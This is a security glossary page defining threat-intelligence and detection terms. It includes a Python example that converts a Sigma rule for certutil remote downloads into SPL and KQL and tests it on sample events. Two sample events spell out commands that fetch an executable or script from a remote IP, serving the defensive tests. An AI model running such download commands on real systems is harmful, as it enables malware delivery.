
Threat Intelligence & Detection Engineering Glossary

Plain-English explanations of the core concepts behind the Threadlinqs platform — what each term means, why it matters, and how it fits into modern security operations.

What is Threat Intelligence?

The definition and types of cyber threat intelligence (strategic, tactical, operational), the intelligence cycle, the difference between indicators of compromise (IOCs) and adversary tactics, techniques, and procedures (TTPs), and how threat intel reduces mean time to detect and mean time to respond (MTTD/MTTR) in the SOC.


What is Detection Engineering?

How detection engineering turns threat intelligence into testable, version-controlled detection logic — the detection lifecycle, rule quality, and measuring coverage against adversary behavior.


What is MITRE ATT&CK?

The MITRE ATT&CK framework explained — tactics, techniques, and procedures (TTPs), how the matrix is structured, and how teams use it to map coverage and find detection gaps.


What are Sigma Rules?

The vendor-agnostic, YAML-based detection rule format — how Sigma works, why it is portable across SIEMs, and how it converts to Splunk SPL, Microsoft KQL, and other backends.


What is Splunk SPL?

Splunk's Search Processing Language explained — core commands, how SPL queries detect threats in log data, and how it compares to other SIEM query languages.

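The Sigma and SPL entries above describe rule portability and conversion in the abstract. The following added example (my own illustration, not code from the Threadlinqs platform or from the Sigma project's converters) shows the mechanics on one rule: the parsed form of a Sigma rule, a toy backend that renders it as Splunk SPL and as Microsoft KQL, and an in-memory evaluator that runs the same logic over a few constructed Sysmon-style process-creation events, which is the kind of test a detection engineer would commit alongside the rule. The rule, the events, the Splunk `source`/`EventCode` prefix, the Defender `DeviceProcessEvents` column mapping and every helper name here are assumptions; only the four string modifiers and plain `and`/`or`/`not` conditions are supported.

```python
"""Toy Sigma evaluator and SPL/KQL converter (added example, not Threadlinqs code)."""
import re

# Constructed rule in its parsed (YAML-loaded) form; the filter's internal host is invented.
RULE = {
    "title": "Certutil Download From Remote URL",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["-urlcache", "http"]},
        "filter": {"CommandLine|contains": "://updates.corp.example/"},
        "condition": "selection and not filter",
    },
    "tags": ["attack.command_and_control", "attack.t1105"],
}
# Backends: how each Sigma modifier renders and how Sigma field names map. The Splunk
# source/EventCode prefix and the Defender DeviceProcessEvents columns are assumptions.
SPL = {"ops": {"equals": '{f}="{v}"', "contains": '{f}="*{v}*"',
               "startswith": '{f}="{v}*"', "endswith": '{f}="*{v}"'},
       "fields": {}, "and": "AND", "or": "OR", "not": "NOT",
       "prefix": 'source="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 '}
KQL = {"ops": {"equals": '{f} =~ "{v}"', "contains": '{f} contains "{v}"',
               "startswith": '{f} startswith "{v}"', "endswith": '{f} endswith "{v}"'},
       "fields": {"Image": "FolderPath", "CommandLine": "ProcessCommandLine"},
       "and": "and", "or": "or", "not": "not", "prefix": "DeviceProcessEvents | where "}

def _parse_key(key):
    """Split 'Field|modifier|all' into (field, modifier, combiner); combiner is any or all."""
    field, *mods = key.split("|")
    op = next((m for m in mods if m != "all"), "equals")
    if op not in ("equals", "contains", "startswith", "endswith"):
        raise ValueError(f"unsupported Sigma modifier: {op}")
    return field, op, all if "all" in mods else any

def _match_value(actual, op, wanted):
    a, w = str(actual).lower(), str(wanted).lower()  # Sigma string matching is case-insensitive
    return {"equals": a == w, "contains": w in a, "startswith": a.startswith(w), "endswith": a.endswith(w)}[op]

def _match_block(event, block):
    """A selection map ANDs its fields; a list value is OR, or AND under the |all modifier."""
    def field_ok(key, value):
        field, op, combine = _parse_key(key)
        return combine(_match_value(event.get(field, ""), op, v) for v in (value if isinstance(value, list) else [value]))
    return all(field_ok(k, v) for k, v in block.items())

def _eval_condition(cond, results):
    """Recursive-descent evaluator for boolean conditions such as 'a and (b or not c)'."""
    toks = re.findall(r"\(|\)|\w+", cond)
    def atom():
        t = toks.pop(0)
        if t == "(":
            v = expr()
            toks.pop(0)  # the closing parenthesis
            return v
        return (not atom()) if t == "not" else results[t]
    def term():
        v = atom()
        while toks and toks[0] == "and":
            toks.pop(0)
            v = atom() and v
        return v
    def expr():
        v = term()
        while toks and toks[0] == "or":
            toks.pop(0)
            v = term() or v
        return v
    return expr()

def run_rule(rule, events):
    """Evaluate the rule in memory and return the ids of the events it fires on."""
    det = rule["detection"]
    blocks = {k: v for k, v in det.items() if k != "condition"}
    return [e["id"] for e in events if _eval_condition(det["condition"], {n: _match_block(e, b) for n, b in blocks.items()})]

def _esc(v):
    return str(v).replace("\\", "\\\\").replace('"', '\\"')

def _render_block(block, be):
    """Render one selection map as a backend fragment using the same AND/OR semantics as _match_block."""
    parts = []
    for key, value in block.items():
        field, op, combine = _parse_key(key)
        terms = [be["ops"][op].format(f=be["fields"].get(field, field), v=_esc(v)) for v in (value if isinstance(value, list) else [value])]
        parts.append(terms[0] if len(terms) == 1 else "(" + f" {be['and' if combine is all else 'or']} ".join(terms) + ")")
    return f" {be['and']} ".join(parts)

def convert(rule, be):
    """Substitute each block name in the condition with its rendered fragment; keywords map 1:1."""
    det = rule["detection"]
    rendered = {k: _render_block(v, be) for k, v in det.items() if k != "condition"}
    sub = lambda m: be[m[0]] if m[0] in ("and", "or", "not") else "(" + rendered[m[0]] + ")"
    return be["prefix"] + re.sub(r"\w+", sub, det["condition"])

# Constructed Sysmon-style events: e1 should fire; e2 hits the allow-listed internal host,
# e3 is a benign certutil use and e4 is not certutil, so none of those should fire.
EVENTS = [
    {"id": "e1", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.exe C:\Users\Public\update.exe"},
    {"id": "e2", "Image": r"C:\Windows\System32\CertUtil.EXE",
     "CommandLine": "CertUtil.EXE -urlcache -f https://updates.corp.example/agent.msi agent.msi"},
    {"id": "e3", "Image": r"C:\Windows\System32\certutil.exe", "CommandLine": r"certutil -hashfile C:\Temp\agent.msi SHA256"},
    {"id": "e4", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest http://203.0.113.5/a.ps1"},
]
```

`convert(RULE, SPL)` and `convert(RULE, KQL)` give the two backend queries, and `run_rule(RULE, EVENTS)` returns `["e1"]`: the mixed-case `CertUtil.EXE` in e2 still matches the selection because Sigma string matching is case-insensitive, and it is then excluded by the filter. The point of keeping the evaluator next to the converter is that the same rule, with its sample events, can be checked in CI before any SIEM sees it; production conversions should use pySigma or sigma-cli with a processing pipeline for the target log source rather than a backend table like the one above.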

See These Concepts in Action

Browse real threats with production detection rules in SPL, KQL, and Sigma — mapped to MITRE ATT&CK. Free on the Blue tier.
